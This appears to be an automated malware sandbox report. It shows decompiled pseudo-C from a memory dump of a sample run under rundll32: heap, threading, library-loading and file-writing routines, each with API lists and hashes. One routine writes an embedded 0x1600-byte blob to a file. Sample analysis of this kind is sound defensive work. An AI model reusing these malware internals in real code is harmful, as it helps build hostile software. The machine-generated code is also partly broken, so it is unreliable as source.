                                                            											__ecx =  *( *(__ebp - 0x134) + __ecx * 2) & 0x0000ffff;
                                                            											__eax =  *(__ebp - 0x13c);
                                                            											__eax =  *( *(__ebp - 0x13c) + __ecx * 4);
                                                            											__ecx = 0;
                                                            											 *(__ebp - 0x120) = __eax;
                                                            											asm("adc ecx, [ebp-0x128]");
                                                            											 *(__ebp - 0x11c) = 0;
                                                            										} else {
                                                            											__esi =  *(__ebp - 0x150);
                                                            											__ebx =  *((intOrPtr*)(__ebp - 0x124));
                                                            											__edi =  *(__ebp - 0x128);
                                                            											goto L29;
                                                            										}
                                                            									} else {
                                                            										__eflags = 0;
                                                            										if(0 == 0) {
                                                            											goto L29;
                                                            										} else {
                                                            											goto L17;
                                                            										}
                                                            									}
                                                            									goto L31;
                                                            									L29:
                                                            									__ecx = __ecx + 1;
                                                            									 *(__ebp - 0x11c) = __ecx;
                                                            									__eflags = __ecx - __esi;
                                                            								} while (__ecx < __esi);
                                                            								goto L30;
                                                            							}
                                                            							L31:
                                                            							__eax =  *(__ebp - 0x138);
                                                            							__eflags = __eax;
                                                            							if(__eax != 0) {
                                                            								__eax = L0465ED17(__eax);
                                                            								 *(__ebp - 0x138) = 0;
                                                            							}
                                                            						} else {
                                                            							asm("xorps xmm0, xmm0");
                                                            							asm("movlpd [ebp-0x120], xmm0");
                                                            						}
                                                            						__eax =  *(__ebp - 0x134);
                                                            						__eflags = __eax;
                                                            						if(__eax != 0) {
                                                            							__eax = L0465ED17(__eax);
                                                            							 *(__ebp - 0x134) = 0;
                                                            						}
                                                            					} else {
                                                            						asm("xorps xmm0, xmm0");
                                                            						asm("movlpd [ebp-0x120], xmm0");
                                                            					}
                                                            					__eax =  *(__ebp - 0x13c);
                                                            					__eflags = __eax;
                                                            					if(__eax != 0) {
                                                            						__eax = L0465ED17(__eax);
                                                            					}
                                                            					__ecx =  *(__ebp - 4);
                                                            					__eax =  *(__ebp - 0x120);
                                                            					__ecx =  *(__ebp - 4) ^ __ebp;
                                                            					__eflags = __ecx;
                                                            					__edx =  *(__ebp - 0x11c);
                                                            					_pop(__esi);
                                                            					_pop(__ebx);
                                                            					__eax = E04655AFE(__ecx);
                                                            					__esp = __ebp;
                                                            					_pop(__ebp);
                                                            					return __eax;
                                                            				}
                                                            			}




                                                            0x046488ba
                                                            0x046488c0
                                                            0x046488c6
                                                            0x046488c9
                                                            0x046488cf
                                                            0x046488d4
                                                            0x046488d6
                                                            0x046488d8
                                                            0x046488da
                                                            0x046488da
                                                            0x046488e8
                                                            0x046488ee
                                                            0x046488f4
                                                            0x046488f6
                                                            0x04648731
                                                            0x046488fc
                                                            0x046488fc
                                                            0x04648902
                                                            0x04648908
                                                            0x0464890f
                                                            0x04648911
                                                            0x04648913
                                                            0x04648917
                                                            0x04648922
                                                            0x0464892b
                                                            0x0464892d
                                                            0x04648933
                                                            0x04648938
                                                            0x0464893a
                                                            0x0464893c
                                                            0x0464893e
                                                            0x0464893e
                                                            0x0464894c
                                                            0x04648952
                                                            0x04648958
                                                            0x0464895a
                                                            0x0464896c
                                                            0x04648972
                                                            0x04648978
                                                            0x0464897b
                                                            0x0464897d
                                                            0x0464897f
                                                            0x04648983
                                                            0x0464898e
                                                            0x04648997
                                                            0x0464899a
                                                            0x046489a0
                                                            0x046489a5
                                                            0x046489a7
                                                            0x046489a9
                                                            0x046489ab
                                                            0x046489ab
                                                            0x046489bf
                                                            0x046489c1
                                                            0x046489c7
                                                            0x046489c9
                                                            0x046489db
                                                            0x046489e1
                                                            0x046489e7
                                                            0x046489ee
                                                            0x046489f0
                                                            0x046489f2
                                                            0x046489f6
                                                            0x046489f8
                                                            0x046489fd
                                                            0x04648a03
                                                            0x04648a08
                                                            0x04648a0e
                                                            0x04648a10
                                                            0x04648add
                                                            0x04648add
                                                            0x04648ae0
                                                            0x04648a16
                                                            0x04648a16
                                                            0x04648a20
                                                            0x04648a20
                                                            0x04648a26
                                                            0x04648a29
                                                            0x04648a2b
                                                            0x04648a2d
                                                            0x04648a2f
                                                            0x04648a31
                                                            0x04648a3b
                                                            0x04648a3b
                                                            0x04648a42
                                                            0x04648a48
                                                            0x04648a4e
                                                            0x04648a50
                                                            0x04648a55
                                                            0x04648a59
                                                            0x04648a5b
                                                            0x04648a5c
                                                            0x04648a61
                                                            0x04648a62
                                                            0x04648a68
                                                            0x04648a6f
                                                            0x04648a72
                                                            0x04648a72
                                                            0x04648a75
                                                            0x04648a77
                                                            0x04648a79
                                                            0x04648a7b
                                                            0x04648a8e
                                                            0x04648a8e
                                                            0x04648a7d
                                                            0x04648a7d
                                                            0x04648a80
                                                            0x04648a8b
                                                            0x04648a8b
                                                            0x04648a8c
                                                            0x00000000
                                                            0x00000000
                                                            0x04648a82
                                                            0x04648a82
                                                            0x04648a84
                                                            0x04648a86
                                                            0x04648a89
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04648a89
                                                            0x04648a84
                                                            0x04648a80
                                                            0x04648a7b
                                                            0x04648a95
                                                            0x04648a97
                                                            0x04648a9c
                                                            0x04648aa4
                                                            0x04648aa8
                                                            0x04648aa9
                                                            0x04648ab0
                                                            0x04648ab6
                                                            0x04648b52
                                                            0x04648b58
                                                            0x04648b5c
                                                            0x04648b62
                                                            0x04648b65
                                                            0x04648b6d
                                                            0x04648b73
                                                            0x04648b79
                                                            0x04648abc
                                                            0x04648abc
                                                            0x04648ac2
                                                            0x04648ac8
                                                            0x00000000
                                                            0x04648ac8
                                                            0x04648a33
                                                            0x04648a33
                                                            0x04648a35
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04648a35
                                                            0x00000000
                                                            0x04648ace
                                                            0x04648ace
                                                            0x04648acf
                                                            0x04648ad5
                                                            0x04648ad5
                                                            0x00000000
                                                            0x04648a20
                                                            0x04648ae8
                                                            0x04648ae8
                                                            0x04648aee
                                                            0x04648af0
                                                            0x04648af3
                                                            0x04648afb
                                                            0x04648afb
                                                            0x046489cb
                                                            0x046489cb
                                                            0x046489ce
                                                            0x046489ce
                                                            0x04648b05
                                                            0x04648b0b
                                                            0x04648b0d
                                                            0x04648b10
                                                            0x04648b18
                                                            0x04648b18
                                                            0x0464895c
                                                            0x0464895c
                                                            0x0464895f
                                                            0x0464895f
                                                            0x04648b22
                                                            0x04648b28
                                                            0x04648b2a
                                                            0x04648b2d
                                                            0x04648b32
                                                            0x04648b35
                                                            0x04648b38
                                                            0x04648b3e
                                                            0x04648b3e
                                                            0x04648b40
                                                            0x04648b47
                                                            0x04648b48
                                                            0x04648b49
                                                            0x04648b4e
                                                            0x04648b50
                                                            0x04648b51
                                                            0x04648b51

                                                            APIs
                                                            • GetProcessHeap.KERNEL32 ref: 046488D8
                                                            • RtlAllocateHeap.NTDLL(02AA0000,00000000,?), ref: 046488E8
                                                            • GetProcessHeap.KERNEL32 ref: 0464893C
                                                            • RtlAllocateHeap.NTDLL(02AA0000,00000000,?), ref: 0464894C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID:
                                                            • API String ID: 1357844191-0
                                                            • Opcode ID: cb7f457e8d0849ef9d89a574c1cfa55392e204d8b541a699042a38196027d5ef
                                                            • Instruction ID: 364c2528d09a19f822d9122a703cb4816be9171642a5466ebc447ce9dd9e612d
                                                            • Opcode Fuzzy Hash: cb7f457e8d0849ef9d89a574c1cfa55392e204d8b541a699042a38196027d5ef
                                                            • Instruction Fuzzy Hash: 64210975A002299BDF24DF69DC85BDAB7B4FB98351F1051999809E3300F634AE908F80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0464EAF0(intOrPtr* __ecx, intOrPtr _a4) {
                                                            				intOrPtr _t27;
                                                            				intOrPtr _t33;
                                                            				intOrPtr _t39;
                                                            				intOrPtr _t40;
                                                            				intOrPtr* _t41;
                                                            				struct _CRITICAL_SECTION* _t42;
                                                            
                                                            				_t41 = __ecx;
                                                            				_t42 = __ecx + 0x14c;
                                                            				EnterCriticalSection(_t42);
                                                            				if( *((intOrPtr*)( *_t41 + 0x40))() != 0) {
                                                            					_t40 = _a4;
                                                            					_t33 =  *((intOrPtr*)(_t41 + 0x180));
                                                            					 *((intOrPtr*)(_t41 + 0x180)) =  *((intOrPtr*)(_t41 + 0x180)) +  *((intOrPtr*)( *((intOrPtr*)(_t40 + 4)) + 0x18)) -  *((intOrPtr*)( *((intOrPtr*)(_t40 + 4)) + 0x14));
                                                            					_t39 =  *((intOrPtr*)(_t40 + 4));
                                                            					 *((intOrPtr*)(_t40 + 4)) = 0;
                                                            					_t27 =  *((intOrPtr*)(_t41 + 0x16c));
                                                            					if(_t27 == 0) {
                                                            						 *((intOrPtr*)(_t39 + 8)) = 0;
                                                            						 *((intOrPtr*)(_t39 + 4)) = 0;
                                                            						 *((intOrPtr*)(_t41 + 0x168)) = _t39;
                                                            					} else {
                                                            						 *((intOrPtr*)(_t27 + 4)) = _t39;
                                                            						 *((intOrPtr*)(_t39 + 8)) =  *((intOrPtr*)(_t41 + 0x16c));
                                                            					}
                                                            					 *((intOrPtr*)(_t41 + 0x164)) =  *((intOrPtr*)(_t41 + 0x164)) + 1;
                                                            					 *((intOrPtr*)(_t41 + 0x16c)) = _t39;
                                                            					LeaveCriticalSection(_t42);
                                                            					if(_t33 == 0 &&  *((intOrPtr*)(_t41 + 0x180)) > 0) {
                                                            						SetEvent( *(_t41 + 0x174));
                                                            					}
                                                            					return 0;
                                                            				} else {
                                                            					LeaveCriticalSection(_t42);
                                                            					return 0x139f;
                                                            				}
                                                            			}









                                                            0x0464eaf5
                                                            0x0464eaf7
                                                            0x0464eafe
                                                            0x0464eb0d
                                                            0x0464eb21
                                                            0x0464eb25
                                                            0x0464eb34
                                                            0x0464eb3a
                                                            0x0464eb3d
                                                            0x0464eb44
                                                            0x0464eb4c
                                                            0x0464eb5c
                                                            0x0464eb63
                                                            0x0464eb6a
                                                            0x0464eb4e
                                                            0x0464eb4e
                                                            0x0464eb57
                                                            0x0464eb57
                                                            0x0464eb70
                                                            0x0464eb77
                                                            0x0464eb7d
                                                            0x0464eb86
                                                            0x0464eb97
                                                            0x0464eb97
                                                            0x0464eba2
                                                            0x0464eb0f
                                                            0x0464eb10
                                                            0x0464eb1e
                                                            0x0464eb1e

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464EAFE
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464EB10
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464EB7D
                                                            • SetEvent.KERNEL32(?,?,0464E994,?,?,00000000,?,?,00000000), ref: 0464EB97
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterEvent
                                                            • String ID:
                                                            • API String ID: 3394196147-0
                                                            • Opcode ID: 0dae0d1b890a939e4adfccd3870111d4458057d4cfbb6745bfc25b038ae5fbf2
                                                            • Instruction ID: a7579d8c9c49a66ad67229d44514738858670e0cab57064c34ca8f754addc1c0
                                                            • Opcode Fuzzy Hash: 0dae0d1b890a939e4adfccd3870111d4458057d4cfbb6745bfc25b038ae5fbf2
                                                            • Instruction Fuzzy Hash: 14111671200605EFD7088F69D988BE6FBA8FF59314F05826AE51D8B311EB36E851CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04668FF4(signed int _a4) {
                                                            				signed int _t9;
                                                            				void* _t13;
                                                            				signed int _t15;
                                                            				WCHAR* _t22;
                                                            				signed int _t24;
                                                            				signed int* _t25;
                                                            				void* _t27;
                                                            
                                                            				_t9 = _a4;
                                                            				_t25 = 0x4687570 + _t9 * 4;
                                                            				_t24 =  *_t25;
                                                            				if(_t24 == 0) {
                                                            					_t22 =  *(0x4679d30 + _t9 * 4);
                                                            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                            					if(_t27 != 0) {
                                                            						L8:
                                                            						 *_t25 = _t27;
                                                            						if( *_t25 != 0) {
                                                            							FreeLibrary(_t27);
                                                            						}
                                                            						_t13 = _t27;
                                                            						L11:
                                                            						return _t13;
                                                            					}
                                                            					_t15 = GetLastError();
                                                            					if(_t15 != 0x57) {
                                                            						_t27 = 0;
                                                            					} else {
                                                            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                            						_t27 = _t15;
                                                            					}
                                                            					if(_t27 != 0) {
                                                            						goto L8;
                                                            					} else {
                                                            						 *_t25 = _t15 | 0xffffffff;
                                                            						_t13 = 0;
                                                            						goto L11;
                                                            					}
                                                            				}
                                                            				_t4 = _t24 + 1; // 0xd355be4f
                                                            				asm("sbb eax, eax");
                                                            				return  ~_t4 & _t24;
                                                            			}










                                                            0x04668ff9
                                                            0x04668ffd
                                                            0x04669004
                                                            0x04669008
                                                            0x04669016
                                                            0x0466902c
                                                            0x04669030
                                                            0x04669059
                                                            0x0466905b
                                                            0x0466905f
                                                            0x04669062
                                                            0x04669062
                                                            0x04669068
                                                            0x0466906a
                                                            0x00000000
                                                            0x0466906b
                                                            0x04669032
                                                            0x0466903b
                                                            0x0466904a
                                                            0x0466903d
                                                            0x04669040
                                                            0x04669046
                                                            0x04669046
                                                            0x0466904e
                                                            0x00000000
                                                            0x04669050
                                                            0x04669053
                                                            0x04669055
                                                            0x00000000
                                                            0x04669055
                                                            0x0466904e
                                                            0x0466900a
                                                            0x0466900f
                                                            0x00000000

                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,04668F99,?,00000001,00000000,?,?,04669463,00000008,GetCurrentPackageId), ref: 04669026
                                                            • GetLastError.KERNEL32(?,04668F99,?,00000001,00000000,?,?,04669463,00000008,GetCurrentPackageId,0467A1F0,GetCurrentPackageId,00000000), ref: 04669032
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,04668F99,?,00000001,00000000,?,?,04669463,00000008,GetCurrentPackageId,0467A1F0,GetCurrentPackageId,00000000), ref: 04669040
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 7e9b0b117b23ea2a747f393bbb9297a7ef6f9bbdade63f0c0d7e4a8a4e9c3c36
                                                            • Instruction ID: d556272c01c843d0661df7a01ba09b50e83eb4d17fb076d7cb7713cd26c96742
                                                            • Opcode Fuzzy Hash: 7e9b0b117b23ea2a747f393bbb9297a7ef6f9bbdade63f0c0d7e4a8a4e9c3c36
                                                            • Instruction Fuzzy Hash: C201D872711226DBCB2149799C44A567798EB55B617140528ED1BD7240FB34E809C6E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E04652920(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                            				long _v8;
                                                            				intOrPtr _v12;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t25;
                                                            				void _t29;
                                                            				long _t32;
                                                            				intOrPtr _t37;
                                                            				intOrPtr _t39;
                                                            				intOrPtr _t48;
                                                            				struct _CRITICAL_SECTION* _t49;
                                                            				struct _CRITICAL_SECTION* _t52;
                                                            
                                                            				_t39 = __ecx;
                                                            				_t48 = _a4;
                                                            				_v12 = __ecx;
                                                            				_v8 = 0;
                                                            				if(_t48 == 0 ||  *((intOrPtr*)(_t48 + 0x30)) == 0) {
                                                            					return _t25;
                                                            				} else {
                                                            					_t5 = _t48 + 0x54; // 0x54
                                                            					_t52 = _t5;
                                                            					 *((intOrPtr*)(_t48 + 0x48)) = 0;
                                                            					EnterCriticalSection(_t52);
                                                            					_t49 = _t48 + 0x6c;
                                                            					EnterCriticalSection(_t49);
                                                            					_t37 = _a4;
                                                            					if( *((intOrPtr*)(_t37 + 0x30)) != 0) {
                                                            						 *((intOrPtr*)(_t37 + 0x30)) = 0;
                                                            						_v8 = 1;
                                                            					}
                                                            					LeaveCriticalSection(_t49);
                                                            					_t29 = LeaveCriticalSection(_t52);
                                                            					if(_v8 != 0) {
                                                            						_t54 = _v12;
                                                            						_push(_t39);
                                                            						L04652B90(_v12, _t37, _a8, _a12, _a16);
                                                            						E046551B0(_t37, _t54 + 0x178, LeaveCriticalSection, _t54,  *((intOrPtr*)(_t37 + 4)), 0);
                                                            						_t32 = timeGetTime();
                                                            						_t42 = _t37 + 0x8c;
                                                            						 *((intOrPtr*)(_t37 + 0x34)) = _t32;
                                                            						E04655420( *((intOrPtr*)(_t37 + 0x98)), _t42);
                                                            						E04655860(_t54 + 0x378,  *((intOrPtr*)(_t54 + 0x1c)), 0);
                                                            						_t29 = E0464C930(_t54 + 0x2b4, _t37);
                                                            						if(_t29 == 0) {
                                                            							_t29 = E04654CA0(_t54 + 0x378, _t37);
                                                            						}
                                                            					}
                                                            					return _t29;
                                                            				}
                                                            			}
















                                                            0x04652920
                                                            0x04652927
                                                            0x0465292a
                                                            0x0465292d
                                                            0x04652936
                                                            0x046529ff
                                                            0x04652946
                                                            0x0465294e
                                                            0x0465294e
                                                            0x04652951
                                                            0x04652959
                                                            0x0465295b
                                                            0x0465295f
                                                            0x04652961
                                                            0x04652968
                                                            0x0465296a
                                                            0x04652971
                                                            0x04652971
                                                            0x0465297f
                                                            0x04652982
                                                            0x04652988
                                                            0x0465298a
                                                            0x0465298d
                                                            0x0465299a
                                                            0x046529ad
                                                            0x046529b2
                                                            0x046529b8
                                                            0x046529be
                                                            0x046529c5
                                                            0x046529d5
                                                            0x046529e4
                                                            0x046529eb
                                                            0x046529f4
                                                            0x046529f4
                                                            0x046529eb
                                                            0x00000000
                                                            0x046529fa

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 04652959
                                                            • RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0465295F
                                                            • RtlLeaveCriticalSection.NTDLL(-0000006C), ref: 0465297F
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04652982
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 3168844106-0
                                                            • Opcode ID: ea339d3d356f79625df54b3e9ecb61047bf36dcc714c0767631637daad35a84a
                                                            • Instruction ID: 59a4a41bbcca40a4f1511c73c10f6b85b312f44a73af99dfa0290a005a90a2da
                                                            • Opcode Fuzzy Hash: ea339d3d356f79625df54b3e9ecb61047bf36dcc714c0767631637daad35a84a
                                                            • Instruction Fuzzy Hash: 2C018032400204BBDB15AF5AEC98BDABB78FF54314F144159FD0463360E774B955DAA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E0464A160(WCHAR* __ecx) {
                                                            				long _v8;
                                                            				void* _t14;
                                                            				struct _OVERLAPPED* _t17;
                                                            
                                                            				_push(__ecx);
                                                            				_t17 = 0;
                                                            				if(__ecx == 0) {
                                                            					return 0;
                                                            				} else {
                                                            					_t14 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                                                            					if(_t14 != 0xffffffff) {
                                                            						SetFilePointer(_t14, 0, 0, 0);
                                                            						E0464A110();
                                                            						_v8 = 0;
                                                            						WriteFile(_t14, 0x4684d18, 0x1600,  &_v8, 0);
                                                            						_t17 =  !=  ? 1 : 0;
                                                            						CloseHandle(_t14);
                                                            					}
                                                            					return _t17;
                                                            				}
                                                            			}






                                                            0x0464a163
                                                            0x0464a165
                                                            0x0464a169
                                                            0x0464a1d0
                                                            0x0464a16b
                                                            0x0464a182
                                                            0x0464a187
                                                            0x0464a18d
                                                            0x0464a193
                                                            0x0464a19c
                                                            0x0464a1ab
                                                            0x0464a1b9
                                                            0x0464a1bc
                                                            0x0464a1bc
                                                            0x0464a1c9
                                                            0x0464a1c9

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,76A1ED80,76A1F660,?,?,0464A916), ref: 0464A17C
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0464A916), ref: 0464A18D
                                                            • WriteFile.KERNEL32(00000000,04684D18,00001600,0464A916,00000000,?,0464A916), ref: 0464A1AB
                                                            • CloseHandle.KERNEL32(00000000,?,0464A916), ref: 0464A1BC
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                            • String ID:
                                                            • API String ID: 3604237281-0
                                                            • Opcode ID: 27a9585c058060e2a8b620dde3b79af961cbea841d797e64977d2899c742979b
                                                            • Instruction ID: 3d0b0e26327d8dfe7fc6f44d17207bfe5977af0aa25f5b4d2ddf7b33ad3f3ff4
                                                            • Opcode Fuzzy Hash: 27a9585c058060e2a8b620dde3b79af961cbea841d797e64977d2899c742979b
                                                            • Instruction Fuzzy Hash: 91F0683174222477D73456666C0DFEB7E9CDF86BB2F000259B90DD2180EA655C0186E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 19%
                                                            			E04672289(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				void* _t25;
                                                            				void* _t27;
                                                            				void* _t28;
                                                            				void* _t29;
                                                            				intOrPtr _t30;
                                                            				intOrPtr* _t32;
                                                            				void* _t34;
                                                            
                                                            				_t29 = __edx;
                                                            				_t27 = __ebx;
                                                            				_t36 = _a28;
                                                            				_t30 = _a8;
                                                            				if(_a28 != 0) {
                                                            					_push(_a28);
                                                            					_push(_a24);
                                                            					_push(_t30);
                                                            					_push(_a4);
                                                            					E046728D8(_t36);
                                                            					_t34 = _t34 + 0x10;
                                                            				}
                                                            				_t37 = _a40;
                                                            				_push(_a4);
                                                            				if(_a40 != 0) {
                                                            					_push(_a40);
                                                            				} else {
                                                            					_push(_t30);
                                                            				}
                                                            				E04671D8F(_t28);
                                                            				_t32 = _a32;
                                                            				_push( *_t32);
                                                            				_push(_a20);
                                                            				_push(_a16);
                                                            				_push(_t30);
                                                            				E04672ADA(_t27, _t28, _t29, _t30, _t37);
                                                            				_push(0x100);
                                                            				_push(_a36);
                                                            				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                                                            				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                            				_push(_a20);
                                                            				_push(_a12);
                                                            				_push(_t30);
                                                            				_push(_a4);
                                                            				_t25 = E04672093(_t29, _t32, _t37);
                                                            				if(_t25 != 0) {
                                                            					E04671D5D(_t25, _t30);
                                                            					return _t25;
                                                            				}
                                                            				return _t25;
                                                            			}













                                                            0x04672289
                                                            0x04672289
                                                            0x0467228c
                                                            0x04672291
                                                            0x04672294
                                                            0x04672296
                                                            0x04672299
                                                            0x0467229c
                                                            0x0467229d
                                                            0x046722a0
                                                            0x046722a5
                                                            0x046722a5
                                                            0x046722a8
                                                            0x046722ac
                                                            0x046722af
                                                            0x046722b4
                                                            0x046722b1
                                                            0x046722b1
                                                            0x046722b1
                                                            0x046722b7
                                                            0x046722bd
                                                            0x046722c0
                                                            0x046722c2
                                                            0x046722c5
                                                            0x046722c8
                                                            0x046722c9
                                                            0x046722d2
                                                            0x046722d7
                                                            0x046722da
                                                            0x046722e0
                                                            0x046722e3
                                                            0x046722e6
                                                            0x046722e9
                                                            0x046722ea
                                                            0x046722ed
                                                            0x046722f8
                                                            0x046722fc
                                                            0x00000000
                                                            0x046722fc
                                                            0x04672303

                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 046722A0
                                                              • Part of subcall function 046728D8: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 04672907
                                                              • Part of subcall function 046728D8: ___AdjustPointer.LIBCMT ref: 04672922
                                                            • _UnwindNestedFrames.LIBCMT ref: 046722B7
                                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 046722C9
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 046722ED
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                            • String ID:
                                                            • API String ID: 2901542994-0
                                                            • Opcode ID: a49743d0ee214a8ebd8d6164258b81ed28dcef750fb56b9d151e4ec3bef8cbb7
                                                            • Instruction ID: e1fc7f7a3c80c03dcc5ce0f7c6c7c63ca25664fb2366948891cffce9cf57f196
                                                            • Opcode Fuzzy Hash: a49743d0ee214a8ebd8d6164258b81ed28dcef750fb56b9d151e4ec3bef8cbb7
                                                            • Instruction Fuzzy Hash: 34012932000108BBDF125F55CC10EDA3BBAEF59714F148159FE5865220E332F4A1DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E04651970(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                            				long _t14;
                                                            				long _t18;
                                                            				void* _t22;
                                                            				intOrPtr* _t23;
                                                            				intOrPtr* _t27;
                                                            				intOrPtr _t29;
                                                            
                                                            				_t23 = __ecx;
                                                            				_t22 = __ebx;
                                                            				_t27 = __ecx;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _a4;
                                                            				 *((intOrPtr*)(__ecx + 8)) = _a8;
                                                            				if( *0x4687b70 == 0) {
                                                            					 *0x4687b70 = timeGetTime();
                                                            				}
                                                            				_t14 = InterlockedIncrement(0x4687b70);
                                                            				if(_t14 == 0) {
                                                            					_t14 = InterlockedIncrement(0x4687b70);
                                                            				}
                                                            				_t29 = _a12;
                                                            				 *(_t27 + 0x1c) = _t14;
                                                            				E04651A00(_t22, _t27, _t29);
                                                            				 *((intOrPtr*)( *_t27))(_t29, _t23);
                                                            				_t18 = timeGetTime();
                                                            				 *(_t27 + 0x18) = _t18;
                                                            				 *(_t27 + 0x10) = _t18;
                                                            				 *((intOrPtr*)(_t27 + 0x14)) = 0;
                                                            				 *((intOrPtr*)(_t27 + 0xc)) = 0;
                                                            				 *((intOrPtr*)(_t27 + 0x24)) = 1;
                                                            				E04651DE0(_t27);
                                                            				return _t27;
                                                            			}









                                                            0x04651970
                                                            0x04651970
                                                            0x04651978
                                                            0x0465197a
                                                            0x04651980
                                                            0x0465198a
                                                            0x04651992
                                                            0x04651992
                                                            0x046519a2
                                                            0x046519a6
                                                            0x046519ad
                                                            0x046519ad
                                                            0x046519af
                                                            0x046519b6
                                                            0x046519b9
                                                            0x046519c3
                                                            0x046519c5
                                                            0x046519cd
                                                            0x046519d0
                                                            0x046519d3
                                                            0x046519da
                                                            0x046519e1
                                                            0x046519e8
                                                            0x046519f2

                                                            APIs
                                                            • timeGetTime.WINMM ref: 0465198C
                                                            • InterlockedIncrement.KERNEL32(04687B70), ref: 046519A2
                                                            • InterlockedIncrement.KERNEL32(04687B70), ref: 046519AD
                                                            • timeGetTime.WINMM ref: 046519C5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
